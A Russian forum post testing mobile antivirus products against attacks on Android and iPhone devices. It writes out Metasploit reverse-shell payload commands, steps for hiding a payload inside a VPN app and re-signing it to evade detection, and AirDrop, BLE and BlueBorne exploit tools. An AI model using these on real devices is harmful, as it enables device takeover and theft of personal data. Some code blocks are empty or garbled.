![]() |
Предисловие И все мы мечтаем быть богатыми: миллионерами или даже миллиардерами, наверное, не сыскать личности, которая не желала бы кучу денег, а все отрицающие - явно лжецы. Более того, я думаю, что большинство из Вас уверены, что рано или поздно это произойдет. В современном мире чтобы стать успешным больше не нужно вспахивать огород своей прабабушки в поисках нефти, достаточно лишь создать простенький сайт или приложение, которые тут же подхватят инвесторы, и вот…Вуаля, стозначные числа уже у Вас на счету, но есть один нюанс, как и в прошлом веке нужно с чего-то начинать - поднимать свою пятую точку с дивана и что-то делать, а делать-то не очень и хочется.https://forum.antichat.xyz/attachmen...94d1d1dc68.png https://forum.antichat.xyz/attachmen...944d976082.png Однако что поделать тем, кто уже что-то сотворил, когда они уже отдали свое дело на попечение современным компаниям, которые раз от разу пестрят громкими высказываниями: “Пользуясь нашим сервисом, ты защищен, твои деньги сохранны”, “ Мы лучшая компания и самая безопасная”. А потом вдруг все ваше дело пошло прахом, ваши счета обнулились, а имущество переписано на торчка Колю из соседнего подъезда. Почему? А-а-а, опять Майкрософт недоглядел критическую уязвимость, ну как всегда. Кстати, у этого цикла появился собственный саундтрек, послушайте: Спокойно принять, отрицать реальность или просто ничего не делать, дабы не было чего терять? Склоняюсь больше к последнему. Ладно, долой размышления, у нас второй как-бы выпуск из цикла Проделки Майкрософт, а прошлые вот здесь: Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса - история тотального провала: Defender & Windows 11 Начертите на полу пентаграмму, соберитесь в круг и пустите немного крови на рисунок, а после произнесите заклинание - именно так каждый раз я призываю дисклеймер. Стоп, в этот раз не вышло… Попробуйте так сделать, а то кажись я утратил его благосклонность. Сделали? О, вот же он: Дисклеймер На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку. Проделки Майкрософт: развенчание абсолютно безопасности от Билла Гейтса: цель - мобильные устройства или вторая часть В прошлой части вроде как я обещал проверить защищенность мобильных устройств с установленным “антивирусом” от Майкрософт, да? Ладненько, так уж и быть, но сперва очертим план и подопытных:Издеваться сегодня будем над такими вот системами и устройствами, в этом списке будет как новое поколение, так и старенькие устройства, которые мне удалось найти:
Использовать будем следующие защитные средства:
Над первым пунктом я особо и не морочил голову, запустим метасплоит и используем поиск по ключевым словам: Код: Код:
msfconsoleКод: Код:
use exploit/multi/handlerКод: Код:
set PAYLOAD windows/meterpreter/reverse_tcpКод: Код:
set LHOST 192.168.42.128Код: Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.42.128 LPORT=4444 > payloadAndroid.apkСобственно на этом все, закидываем файлик на оба устройства и открываем, прежде включив установку из неизвестных источников. Леново без особых пререканий открывает зловредный .апк и у нас открывается сессия в слушателе, а вот Андроид 12 и Самсунг А51 выдает кучу предупреждений, но все равно устанавливает потенциально опасный файл, но вот сессии нет. Кстати, Вирустотал показывает обнаружения 54 из 54, не ругайте меня за то, что выгрузил её туда, я прекрасно осведомлен, что всякое попадающее туда, фиксируется в антивирусных базах. Но примите к сведению, что это сделали миллионы до меня и ничего особо не изменится. Теперь повторим аналогичные манипуляции с IOS, эксплоитов для него гораздо меньше, но все же. Аналогично запускаем слушатель, только в этом случае уже ставим нагрузку таким образом: Код: Код:
set payload payload/apple_ios/armle/meterpreter_reverse_tcpКод: Код:
msfvenom -p apple_ios/armle/meterpreter_reverse_tcp LHOST= 192.168.42.128 LPORT=4444 > payloadIOS.ipaПришло время XR, в целом это уже получается какая-то битва между IOS и Андроид, я такого не планировал, но так даже интересней. А вот десятый моментально удалил зловредный файл, даже не дав на него поглядеть, однако второй раз на этот .ipa уже не реагирует, что выглядит довольно-таки странно. После запуска ничего не происходит и наша полезная нагрузка удаляется. XR теперь фаворит что-ли? Не будем отходить от темы Айфонов и проверим один свеженький эксплоит для браузера Сафари, так называемый JIT. Этот модуль использует ошибку оптимизации JIT в Safari Webkit. Это позволяет нам писать шелл-код в раздел памяти RWX в JavaScriptCore и выполнять его. Шеллкод содержит эксплойт ядра (CVE-2016-4669), который получает rw от ядра, а после получает root и отключает подпись кода. Затем мы загружаем и выполняем полезную нагрузку meterpreter. Выглядит это намного проще на практике, чем в описании. Однако стоит заметить, что даже разработчик эксплоита отметил, мол это исключительно работает на IOS 8.0.0 и ниже, напомню, что у нас два представителя от 10.5.5.5, заведомо обрекает на наше поражение, но попробовать хочется. Вдруг выйдет. Хе-хе: Код: Код:
use exploit/apple_ios/browser/safari_jitКод: Код:
show targetsКод: Код:
show optionsКод: Код:
exploitА теперь возвратимся к Андроиду, стало быть дела у нас обстояли следующим образом: 12-й отказался открывать нам оболочку, поэтому сейчас предпримем попытки его обмануть. Сперва используем автоматизированный метод, который наверняка провалится, но показать охота, это какой-то непонятный скрипт из Гитхаб, давайте-ка его установим в нашу Кали: Код: Код:
git clone https://github.com/AnonymousAt3/cyberdoor.gitКод: Код:
cd cyberdoorhttps://forum.antichat.xyz/attachmen...5d9e3f624f.png Плюс этой штуки в том, что она попытается произвести автоматическую подпись и это нам только на руку, как я считаю. Выгружаем результат на наш Андроид 12, теперь он не пытается удалить сразу же этот файл и пока что никак не реагирует, однако стоит его открыть и происходит все то же, что и в случае с обычной полезной нагрузкой. Метод хрень, не используйте ни в коем случае. Пойдем немного другим путем, он уже намного интереснее и шанс того, что прокатит- немного больше, начинаем. Генерируем дефолтную полезную нагрузку для Андроид: Код: Код:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.42.128 lport=4444 -o /root/1vasa.apkКод: Код:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Первым делом декомпилируем созданный нами APK в папку Vasa: Код: Код:
apktool d -f -o Vasa /root/1vasa.apkКод: Код:
apktool d -f -o original /root/turbovpn.apkКод: Код:
/root/payload/smali/com/metasploit/stagehttps://forum.antichat.xyz/attachmen...258337ad78.png Для этого требуется отредактировать слайм файлы, это те самые a, b, c.smail. Значится открываем файл AndroidManifest.xml, расположенный в /root/original посредством любого текстового редактора. Затем мы ищем ярлык, который содержит обе строки: Код: Код:
Код: Код:
"com.turbo2.VPN.StartActivity".Стало быть теперь у нас есть понимание о названии этой опции и мы можем найти её в .smali коде, откроем её с помощью leafpad и заменим Activity_Путь "android:name”, но вместо точек, введем такое: Код: Код:
/root/original/smali/com/turbo2/VPN/StartActivity.smailКод: Код:
apktool b /root/originalКод: Код:
keytool –genkey –v –keystore my-release-key.jks –keyalg RSA –keysize 2048 –validity 10000 –alias my-aliaКод: Код:
jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.jks /usr/local/bin/VPN.apk my-aliasАналогично сработало и на 7-й, ну это очевидно уже было. https://forum.antichat.xyz/attachmen...0505839664.png Третий пункт в плане тестирования будет краток, изложу быстро: Андроид 7 - Хамминг был запущен и начал показ рекламы как только появился на устройстве. А51 отверг эту штуковину как только она попала в его файловую систему. Айфон 5 - спокойно запустил MagSafe, а вот XR воспротивился. Переходим к четвертому пункту, используем уязвимость в AirDrop. Здесь все дело в начальной стадии передачи, когда устройства пытаются понять находятся ли их мобильные номера в списке контактов или же почты, потому отправляют пакет AWDL (Apple Wireless Direct Link), который содержит в себе всю необходимую информацию как: технические характеристики,номера телефонов, идентификаторы Apple ID, адреса электронной почты. Конечно в 2019 году это шифровалось с помощью SHA256, вроде так и осталось кстати, но что такое этот тип шифрования? Я могу вбить в гугле “дешифратор SHA256” и легко узнать ваши персональные данные. И чтобы это сделать мне не нужно иметь образование или быть специалистом в какой-то из областей IT, мне достаточно установить Кали и вот этот репозиторий: Код: Код:
git clone https://github.com/hexway/apple_bleee.gitНу, и установить все необходимые зависимости для работы: Код: Код:
sudo apt update && sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-devКод: Код:
sudo iwconfig wlan0 mode monitor && sudo ip link set wlan0 up && sudo owl -i wlan0 -N &Код: Код:
sudo python3 airdrop_leak.pyТакже было обнаружено ещё несколько десятков похожих уязвимостей, которые связаны с Блютузом, точнее с функцией BLE, через которую устройства обмениваются информацией с ближайшим соседом, при том мы можете даже не пользоваться ничем, но информация все равно будет передана. И вот эту частоту с легкостью можно прослушивать, представим, что какой-то Денис сидит у вас за стенкой и ожидает когда же вы начнете что-то делать. В репозитории, который мы уже установили имеется данный скрипт, потому запустим его: Код: Код:
python3 ble_read_state.pyА затем мы и вовсе можем запросить обмен паролями, но для этого уже понадобится информация из прошлого скрипта: Код: Код:
adv_wifi.py [-h] [-p PHONE]И раз пошла такая пьянка с блютузом, то давайте попытаемся эксплуатировать уязвимость BluBorne в Андроид. Здесь я вставлю такую вот цитатку, чтобы вы примерно ориентировались во всем этом: Что такое BlueBorn? BlueBorne — это вектор атаки, с помощью которого хакеры могут использовать соединения Bluetooth для проникновения и получения полного контроля над целевыми устройствами. BlueBorne влияет на обычные компьютеры, мобильные телефоны и расширяющуюся область устройств IoT. Атака не требует, чтобы целевое устройство было сопряжено с устройством злоумышленника или даже было переведено в режим обнаружения. На данный момент Armis Labs выявила восемь уязвимостей нулевого дня, которые указывают на существование и потенциал вектора атаки. Армис считает, что на различных платформах, использующих Bluetooth, предстоит обнаружить еще много уязвимостей. Эти уязвимости полностью работоспособны и могут быть успешно использованы, как показано в нашем исследовании. Вектор атаки BlueBorne можно использовать для совершения широкого круга правонарушений. Но вот нас интересует конкретно одна - это CVE-2017-0785, которая очень схожа с тем, что мы только что делали с Айфоном. Как и в XR в А51 она уже давным давно исправлена, но мы имеем некий призрачный шанс на эксплуатацию седьмого ведроида. Сперва установим необходимые библиотеки: Код: Код:
sudo apt-get install bluetooth libbluetooth-devКод: Код:
git clone https://github.com/ArmisSecurity/blueborne.gitА теперь время самого интересного, устанавливаем AVAST Mobile на все устройства и погнали тестировать, что же изменилось: Леново ТАБ-7, Андроид 7: Полезная нагрузка как открывала обратную оболочку, так и открывает. Подписанный и склеенный АПК работает без проблем. А вот Хамминг был уничтожен антивирусом. Самсунг Галактика А51, Андроид 12: Изменений нет. Даже без антивируса он неплохо противостоял всяческим угрозам, а вот подписанный АПК не замечает. Айфон 5, IOS 10.5.5: Никакого результата, полезная нагрузка открывает оболочку и никак не обнаруживается антивирусом, даже если запустить сканирование. Ошибка в AirDrop никак не исправлена. Айфон XR, ISO 16: Аваст бесполезен. Позитивная динамика не обнаружена. Eset Mobile Security, установили, проверяем: Леново ТАБ-7, Андроид 7: Полезная нагрузка больше не работает, а сразу же блокируется. Подписанный и склеенный АПК был повержен. А вот Хамминг был уничтожен антивирусом. Самсунг Галактика А51, Андроид 12: Изменения есть. Даже без антивируса он неплохо противостоял всяческим угрозам, но вот подписанный АПК, который не видел по сей момент, смог задетектить и удалить. Айфон 5, IOS 10.5.5: Явно неплохо, полезная нагрузка уничтожена, но вот уязвимость AirDrop осталась и работает. Айфон XR, ISO 16: Совершенная защита. Ничего не работает больше. И пришло время гвоздя программы! Майкрософт Дефендер Мобайл! Леново ТАБ-7, Андроид 7: Полезная нагрузка как открывала обратную оболочку, так и открывает. Подписанный и склеенный АПК работает без проблем. Хамминг не был замечен и спокойно начал показ рекламы. Самсунг Гелакси А51, Андроид 12: Мне кажется ему было лучше без Дефендера. Ибо он начал немного тормозить, но ничего не изменилось и никакой дополнительной защиты мы не увидели. Айфон 5, IOS 10.5.5: Никакого результата, полезная нагрузка открывает оболочку и никак не обнаруживается антивирусом. Ошибка в AirDrop никак не исправлена. Айфон XR, ISO 16: Полезная нагрузка сработала, Дефендер не шелохнулся даже. Итоги Ох и скучная статья вышла… Сколько кода, ужас. Простите. Но мы в очередной раз доказали, что Майкрософт не компетентны в сфере безопасности, так как от их продукта толку, что от пустоты. Её нет, защиты так же нет. Никакой.А с вами был, как всегда, какой-то парнишка под ником DeathDay ( и редактор Яш, который считает статью интересной ) и его творение. Мира всем, не прощаюсь. Microsoft - история провала. |
Круть
|
| Время: 05:47 |